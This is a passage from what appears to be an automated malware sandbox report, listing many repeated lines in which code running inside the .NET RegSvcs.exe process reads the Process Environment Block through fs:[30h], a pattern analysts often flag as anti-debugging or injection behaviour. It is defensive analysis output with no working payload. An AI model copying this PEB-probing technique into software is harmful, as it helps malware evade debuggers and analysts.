                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A250 mov eax, dword ptr fs:[00000030h]8_2_0158A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01618243 mov eax, dword ptr fs:[00000030h]8_2_01618243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01618243 mov ecx, dword ptr fs:[00000030h]8_2_01618243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158826B mov eax, dword ptr fs:[00000030h]8_2_0158826B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164A250 mov eax, dword ptr fs:[00000030h]8_2_0164A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164A250 mov eax, dword ptr fs:[00000030h]8_2_0164A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594260 mov eax, dword ptr fs:[00000030h]8_2_01594260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594260 mov eax, dword ptr fs:[00000030h]8_2_01594260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594260 mov eax, dword ptr fs:[00000030h]8_2_01594260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0166625D mov eax, dword ptr fs:[00000030h]8_2_0166625D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158823B mov eax, dword ptr fs:[00000030h]8_2_0158823B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016662D6 mov eax, dword ptr fs:[00000030h]8_2_016662D6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02E1 mov eax, dword ptr fs:[00000030h]8_2_015A02E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02E1 mov eax, dword ptr fs:[00000030h]8_2_015A02E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02E1 mov eax, dword ptr fs:[00000030h]8_2_015A02E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov ecx, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE284 mov eax, dword ptr fs:[00000030h]8_2_015CE284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE284 mov eax, dword ptr fs:[00000030h]8_2_015CE284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610283 mov eax, dword ptr fs:[00000030h]8_2_01610283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610283 mov eax, dword ptr fs:[00000030h]8_2_01610283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610283 mov eax, dword ptr fs:[00000030h]8_2_01610283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02A0 mov eax, dword ptr fs:[00000030h]8_2_015A02A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02A0 mov eax, dword ptr fs:[00000030h]8_2_015A02A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598550 mov eax, dword ptr fs:[00000030h]8_2_01598550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598550 mov eax, dword ptr fs:[00000030h]8_2_01598550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C656A mov eax, dword ptr fs:[00000030h]8_2_015C656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C656A mov eax, dword ptr fs:[00000030h]8_2_015C656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C656A mov eax, dword ptr fs:[00000030h]8_2_015C656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626500 mov eax, dword ptr fs:[00000030h]8_2_01626500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015965D0 mov eax, dword ptr fs:[00000030h]8_2_015965D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA5D0 mov eax, dword ptr fs:[00000030h]8_2_015CA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA5D0 mov eax, dword ptr fs:[00000030h]8_2_015CA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE5CF mov eax, dword ptr fs:[00000030h]8_2_015CE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE5CF mov eax, dword ptr fs:[00000030h]8_2_015CE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC5ED mov eax, dword ptr fs:[00000030h]8_2_015CC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC5ED mov eax, dword ptr fs:[00000030h]8_2_015CC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015925E0 mov eax, dword ptr fs:[00000030h]8_2_015925E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE59C mov eax, dword ptr fs:[00000030h]8_2_015CE59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016105A7 mov eax, dword ptr fs:[00000030h]8_2_016105A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016105A7 mov eax, dword ptr fs:[00000030h]8_2_016105A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016105A7 mov eax, dword ptr fs:[00000030h]8_2_016105A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C4588 mov eax, dword ptr fs:[00000030h]8_2_015C4588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01592582 mov eax, dword ptr fs:[00000030h]8_2_01592582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01592582 mov ecx, dword ptr fs:[00000030h]8_2_01592582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B45B1 mov eax, dword ptr fs:[00000030h]8_2_015B45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B45B1 mov eax, dword ptr fs:[00000030h]8_2_015B45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B245A mov eax, dword ptr fs:[00000030h]8_2_015B245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161C460 mov ecx, dword ptr fs:[00000030h]8_2_0161C460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158645D mov eax, dword ptr fs:[00000030h]8_2_0158645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h] 8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h] 8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h] 8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h] 8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h] 8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h] 8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BA470 mov eax, dword ptr fs:[00000030h] 8_2_015BA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BA470 mov eax, dword ptr fs:[00000030h] 8_2_015BA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BA470 mov eax, dword ptr fs:[00000030h] 8_2_015BA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0164A456 mov eax, dword ptr fs:[00000030h] 8_2_0164A456
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01616420 mov eax, dword ptr fs:[00000030h] 8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C8402 mov eax, dword ptr fs:[00000030h] 8_2_015C8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C8402 mov eax, dword ptr fs:[00000030h] 8_2_015C8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C8402 mov eax, dword ptr fs:[00000030h] 8_2_015C8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158E420 mov eax, dword ptr fs:[00000030h] 8_2_0158E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158E420 mov eax, dword ptr fs:[00000030h] 8_2_0158E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158E420 mov eax, dword ptr fs:[00000030h] 8_2_0158E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158C427 mov eax, dword ptr fs:[00000030h] 8_2_0158C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015904E5 mov ecx, dword ptr fs:[00000030h] 8_2_015904E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161A4B0 mov eax, dword ptr fs:[00000030h] 8_2_0161A4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C44B0 mov ecx, dword ptr fs:[00000030h] 8_2_015C44B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015964AB mov eax, dword ptr fs:[00000030h] 8_2_015964AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0164A49A mov eax, dword ptr fs:[00000030h] 8_2_0164A49A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590750 mov eax, dword ptr fs:[00000030h] 8_2_01590750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D2750 mov eax, dword ptr fs:[00000030h] 8_2_015D2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D2750 mov eax, dword ptr fs:[00000030h] 8_2_015D2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C674D mov esi, dword ptr fs:[00000030h] 8_2_015C674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C674D mov eax, dword ptr fs:[00000030h] 8_2_015C674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C674D mov eax, dword ptr fs:[00000030h] 8_2_015C674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01598770 mov eax, dword ptr fs:[00000030h] 8_2_01598770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h] 8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01614755 mov eax, dword ptr fs:[00000030h] 8_2_01614755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161E75D mov eax, dword ptr fs:[00000030h] 8_2_0161E75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590710 mov eax, dword ptr fs:[00000030h] 8_2_01590710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C0710 mov eax, dword ptr fs:[00000030h] 8_2_015C0710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160C730 mov eax, dword ptr fs:[00000030h] 8_2_0160C730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CC700 mov eax, dword ptr fs:[00000030h] 8_2_015CC700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C273C mov eax, dword ptr fs:[00000030h] 8_2_015C273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C273C mov ecx, dword ptr fs:[00000030h] 8_2_015C273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C273C mov eax, dword ptr fs:[00000030h] 8_2_015C273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CC720 mov eax, dword ptr fs:[00000030h] 8_2_015CC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CC720 mov eax, dword ptr fs:[00000030h] 8_2_015CC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161E7E1 mov eax, dword ptr fs:[00000030h] 8_2_0161E7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159C7C0 mov eax, dword ptr fs:[00000030h] 8_2_0159C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016107C3 mov eax, dword ptr fs:[00000030h] 8_2_016107C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015947FB mov eax, dword ptr fs:[00000030h] 8_2_015947FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015947FB mov eax, dword ptr fs:[00000030h] 8_2_015947FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B27ED mov eax, dword ptr fs:[00000030h] 8_2_015B27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B27ED mov eax, dword ptr fs:[00000030h] 8_2_015B27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B27ED mov eax, dword ptr fs:[00000030h] 8_2_015B27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016447A0 mov eax, dword ptr fs:[00000030h] 8_2_016447A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163678E mov eax, dword ptr fs:[00000030h] 8_2_0163678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015907AF mov eax, dword ptr fs:[00000030h] 8_2_015907AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165866E mov eax, dword ptr fs:[00000030h] 8_2_0165866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165866E mov eax, dword ptr fs:[00000030h] 8_2_0165866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015AC640 mov eax, dword ptr fs:[00000030h] 8_2_015AC640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C2674 mov eax, dword ptr fs:[00000030h] 8_2_015C2674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CA660 mov eax, dword ptr fs:[00000030h] 8_2_015CA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CA660 mov eax, dword ptr fs:[00000030h] 8_2_015CA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D2619 mov eax, dword ptr fs:[00000030h] 8_2_015D2619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
